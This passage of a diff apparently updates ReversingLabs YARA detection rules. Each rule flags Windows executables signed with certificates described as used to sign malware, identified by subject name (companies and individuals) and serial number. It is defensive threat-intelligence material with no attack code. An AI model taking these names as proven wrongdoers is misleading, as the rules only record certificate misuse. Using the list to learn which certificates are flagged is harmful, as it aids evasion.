 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16690-L16706"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "75e3dfd593d7fdc268de54430be617c015957a624f2ca36bc0036d4cbde5b686"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9728-L9746"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bea8fea49144abc109e33a5964bb8e113aa61b4cd70c72a43183cb0840429571"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21631,21 +46296,21 @@ rule REVERSINGLABS_Cert_Blocklist_0619C5E39A4Fc60A32F9B07F6A4Ca328 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "06:19:c5:e3:9a:4f:c6:0a:32:f9:b0:7f:6a:4c:a3:28" and 1475884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANAQA EVENTS LTD" and ( pe.signatures [ i ] . serial == "00:e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3" or pe.signatures [ i ] . serial == "e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3" ) and 1634720407 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2Bffef48E6A321B418041310Fdb9B0D0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_75Ce08Bdbad44123299Dbe9D7C1D20De : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6a29551f-8359-5394-9acd-00c3b25d7064"
+		id = "e8e2d3b6-077f-56ba-9f2a-1941bf2ebdeb"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16708-L16724"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "30a079b55b75b292f7af4f5ae99184cbb3cca1ce4cf20f2f5c961b533673db00"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9748-L9764"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8ba66ab55f9a6755e11a7f39152aa26917271c7f6bc5ffdb42d07ad791fb47d7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21655,21 +46320,21 @@ rule REVERSINGLABS_Cert_Blocklist_2Bffef48E6A321B418041310Fdb9B0D0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A&D DOMUS LIMITED" and pe.signatures [ i ] . serial == "2b:ff:ef:48:e6:a3:21:b4:18:04:13:10:fd:b9:b0:d0" and 1554681600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rose Holm International ApS" and pe.signatures [ i ] . serial == "75:ce:08:bd:ba:d4:41:23:29:9d:be:9d:7c:1d:20:de" and 1631007095 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_34Ec9565805F34204C6966Fb81E36Ba1 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_333705C20B56E57F60B5Eb191Eef0D90 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bd032608-8622-5c7a-a3a7-808d73e611d7"
+		id = "7f98e550-fca6-564f-bbad-40e153f17adc"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16726-L16742"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e434a02f5b9b22a25d8fe7a0bb7bd81b1cd8bc5356b4b626e3bfceb3f554a085"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9766-L9782"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "30eeec467b837f6b1759cd0fd6a8bc2e8942f2400df170c671287f4159652479"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21679,21 +46344,21 @@ rule REVERSINGLABS_Cert_Blocklist_34Ec9565805F34204C6966Fb81E36Ba1 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "34:ec:95:65:80:5f:34:20:4c:69:66:fb:81:e3:6b:a1" and 1476921600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK Holding ApS" and pe.signatures [ i ] . serial == "33:37:05:c2:0b:56:e5:7f:60:b5:eb:19:1e:ef:0d:90" and 1634233052 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B2B934B7F01E0Ac1E577814992243709 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A2A0Ba281262Acce7A00119E25564386 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "19930e7b-09cb-5c04-b838-3d8d73ba194b"
+		id = "ab0c7b78-5e7e-5cb9-ae61-d88f3f8d9684"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16744-L16762"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "37b254ab76d144c09cc7b622dba59f5e372bf01ae12ce260a06143abb52062f6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9784-L9802"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f5e3c16f6caaf5f3152d90dc48895d0bbcdb296c368beeebb96157f03a8ded40"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21703,21 +46368,21 @@ rule REVERSINGLABS_Cert_Blocklist_B2B934B7F01E0Ac1E577814992243709 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MS CORP SOFTWARE LTD" and ( pe.signatures [ i ] . serial == "00:b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09" or pe.signatures [ i ] . serial == "b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09" ) and 1590710400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sopiteks LLC" and ( pe.signatures [ i ] . serial == "00:a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86" or pe.signatures [ i ] . serial == "a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86" ) and 1631908320 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3A1B397Fd9451E3B5891Fc69681Ed73D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_338483Cc174C16Ebc454A3803Ffd4217 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6bdba43f-4003-5807-9adc-20691fbc8d14"
+		id = "ce30ace6-c2c2-5f3e-a2f7-1f08825d44eb"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16764-L16780"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ca43c7bacd8cb5a896c3135abf4a131bdb4a7f5093e64c8d1df743fad0c1c64a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9804-L9820"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7d7dd55eaab15cf458e5e57f0e5fbebdcc9313aee05394310a5cf9d9b4def153"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21727,21 +46392,21 @@ rule REVERSINGLABS_Cert_Blocklist_3A1B397Fd9451E3B5891Fc69681Ed73D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Zhang" and pe.signatures [ i ] . serial == "3a:1b:39:7f:d9:45:1e:3b:58:91:fc:69:68:1e:d7:3d" and 1470614400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lpr:n Laatu-Ravintolat Oy" and pe.signatures [ i ] . serial == "33:84:83:cc:17:4c:16:eb:c4:54:a3:80:3f:fd:42:17" and 1635208206 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Eb816Aa49E4894D9E9F78729E53Cd48 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Be89936C26Cd0D845074F6B7B47F480C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d2e66765-bdf6-59ff-ac6c-1a82ecefa731"
+		id = "3ff8149b-4a90-5593-b12a-d815b04fce7e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16782-L16798"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4e22568612aec050c7f78b81ba6749528a9c25c0ba43e14260a581a9bea7a2f0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9822-L9840"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "348df24620bfe6322c410cb593f5caad67492b0b5af234ee89b0411beb4b48f9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21751,21 +46416,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Eb816Aa49E4894D9E9F78729E53Cd48 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x96\\x84\\xE5\\x90\\x9B \\xE9\\x9F\\xA6" and pe.signatures [ i ] . serial == "1e:b8:16:aa:49:e4:89:4d:9e:9f:78:72:9e:53:cd:48" and 1429056000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Argus Security Maintenance Systems Inc." and ( pe.signatures [ i ] . serial == "00:be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c" or pe.signatures [ i ] . serial == "be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c" ) and 1634235015 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_383Ca88D6D9379C740609560 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0F20A5155E53Ce20Bb644F646Ed6A2Fd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "46166e9e-515d-530a-a651-59821d979f01"
+		id = "d52066d5-9bc1-5f72-8e97-7efda88c14b2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16800-L16816"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ce41d046a7ca320d034fa226b5e8c22022cc6bfc97eb9ef294b1aca232aaacef"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9842-L9858"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "70d57f2c24d4ae6f17339bfb998589a3b10f5dd4b19ac8a5bc99e082145c4ed0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21775,21 +46440,21 @@ rule REVERSINGLABS_Cert_Blocklist_383Ca88D6D9379C740609560 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "38:3c:a8:8d:6d:93:79:c7:40:60:95:60" and 1478250214 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CB CAM SP Z O O" and pe.signatures [ i ] . serial == "0f:20:a5:15:5e:53:ce:20:bb:64:4f:64:6e:d6:a2:fd" and 1635196200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6731Cb1430F18B8C0C43Ab40E1154169 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "df2423da-37ec-5adc-8497-2ac975b0b7ff"
+		id = "8e059a2a-c436-5247-b395-a2f594c1c9a9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16818-L16834"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c05349166919ffc18ac6ecb61b822a8365f87a82164c5e110ef94345bdc4de6f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9860-L9878"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a18d1c1e5e22c1aa041a4b2d23d2aefcbedbd3517a079d578e1a143ecadb4533"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21799,21 +46464,21 @@ rule REVERSINGLABS_Cert_Blocklist_6731Cb1430F18B8C0C43Ab40E1154169 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "67:31:cb:14:30:f1:8b:8c:0c:43:ab:40:e1:15:41:69" and 1436313600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Postmarket LLC" and ( pe.signatures [ i ] . serial == "00:ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" or pe.signatures [ i ] . serial == "ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" ) and 1635153791 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_159505E6456B9A9352F7C47168D89B96 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ba67B0De51Ebb9B1179804E75357Ab26 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3d078c5d-e469-54f1-bd69-aebeec1c25f1"
+		id = "63938a97-2cb3-52b0-9717-c8949e3fae46"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16836-L16852"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d6d0d5c86dd88afa29fb3c7cc3c0ab2e3401637a23e062ee9bab693a715cf16f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9880-L9898"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "69b9012fc4ab9636d159de49ff452f054030c1157cf70a95512b2a0748dad7c0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21823,21 +46488,21 @@ rule REVERSINGLABS_Cert_Blocklist_159505E6456B9A9352F7C47168D89B96 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shan Feng" and pe.signatures [ i ] . serial == "15:95:05:e6:45:6b:9a:93:52:f7:c4:71:68:d8:9b:96" and 1469404800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fjordland Bike Wear ApS" and ( pe.signatures [ i ] . serial == "00:ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26" or pe.signatures [ i ] . serial == "ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26" ) and 1636145940 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_04A0E92B0B9Ebbb797Df6Ef52Bd5Ad05 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cff2B275Ba8A1Dde83Ac7Ff858399A62 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c6ba359e-4883-534d-bc86-8c063e54c92f"
+		id = "50cc539a-1f00-566d-a83f-b4d8459506d8"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16854-L16870"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ff2a2d06c48bd3426fa42526d966152e3e7166c4170b4e08bb65ee5d876eda93"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9900-L9918"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d37e1d94048339a86b8fa173d3ab753fc5e79329b73df9fda5815cd622c57745"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21847,21 +46512,21 @@ rule REVERSINGLABS_Cert_Blocklist_04A0E92B0B9Ebbb797Df6Ef52Bd5Ad05 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "04:a0:e9:2b:0b:9e:bb:b7:97:df:6e:f5:2b:d5:ad:05" and 1479081600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XL-FORCE ApS" and ( pe.signatures [ i ] . serial == "00:cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62" or pe.signatures [ i ] . serial == "cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62" ) and 1636111842 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_25F222Ab2613Dc4270B2Aabc2519A101 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D22E026C5B5966F1Cf6Ef00A7C06682E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4458df2d-82c2-5377-9746-101c2de52913"
+		id = "a72a0001-a272-506d-b610-c028ed8ac6da"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16872-L16888"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2c6673f6821c4ba11fc015cf3e9edefeb7c45209bc9dcd18501c4681444a9b9e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9920-L9938"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "33a05d46b40ffdf49bfa5facca41ebdf6bedcabc1cb1f5b9bf2d043ad1c869b0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21871,21 +46536,21 @@ rule REVERSINGLABS_Cert_Blocklist_25F222Ab2613Dc4270B2Aabc2519A101 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aeroscan TOV" and pe.signatures [ i ] . serial == "25:f2:22:ab:26:13:dc:42:70:b2:aa:bc:25:19:a1:01" and 1445299200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT, LLC" and ( pe.signatures [ i ] . serial == "00:d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e" or pe.signatures [ i ] . serial == "d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e" ) and 1636456620 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_212Ca239866F88C3D5B000B3004A569C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3054F940C931Bad7B238A24376C6A5Cc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b433cddc-25c3-5627-99b5-ff9bc7fa73ed"
+		id = "e5643d08-5957-58b0-8b46-d5e339dfba9c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16890-L16906"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "23ab2343b17dce74fb4166a690ca5dd300b3ed20d3a6b43b922f456410d3035d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9940-L9956"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "21c8e8f10d1e4b9eb917c86ac868de2afcd5776a9c1d59149df1d07d8c3e14b9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21895,21 +46560,21 @@ rule REVERSINGLABS_Cert_Blocklist_212Ca239866F88C3D5B000B3004A569C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XECURE LAB CO., LTD." and pe.signatures [ i ] . serial == "21:2c:a2:39:86:6f:88:c3:d5:b0:00:b3:00:4a:56:9c" and 1347840000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POLE CLEAN LTD" and pe.signatures [ i ] . serial == "30:54:f9:40:c9:31:ba:d7:b2:38:a2:43:76:c6:a5:cc" and 1637030220 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_18B700A319Aa98Ae71B279D4E8030B82 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A617E23D6Ca8F34E2F7413Cd299Fc72B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8d1a98aa-a895-5e79-905c-760166352d4f"
+		id = "3ffb592c-eec5-51b1-9840-b6b72269fc31"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16908-L16924"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e201498acfd9afebc68321887a806bb5c1d74c64a7cd93530feae2a944bd30fa"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9958-L9976"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f307a0b598f0876c003aa43db50e024698b6f93931e626c085f98553c14ec2ae"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21919,21 +46584,21 @@ rule REVERSINGLABS_Cert_Blocklist_18B700A319Aa98Ae71B279D4E8030B82 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "18:b7:00:a3:19:aa:98:ae:71:b2:79:d4:e8:03:0b:82" and 1479686400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXPRESS BOOKS LTD" and ( pe.signatures [ i ] . serial == "00:a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b" or pe.signatures [ i ] . serial == "a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b" ) and 1636971821 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_169138A86954Be1D9B264F47 : INFO FILE
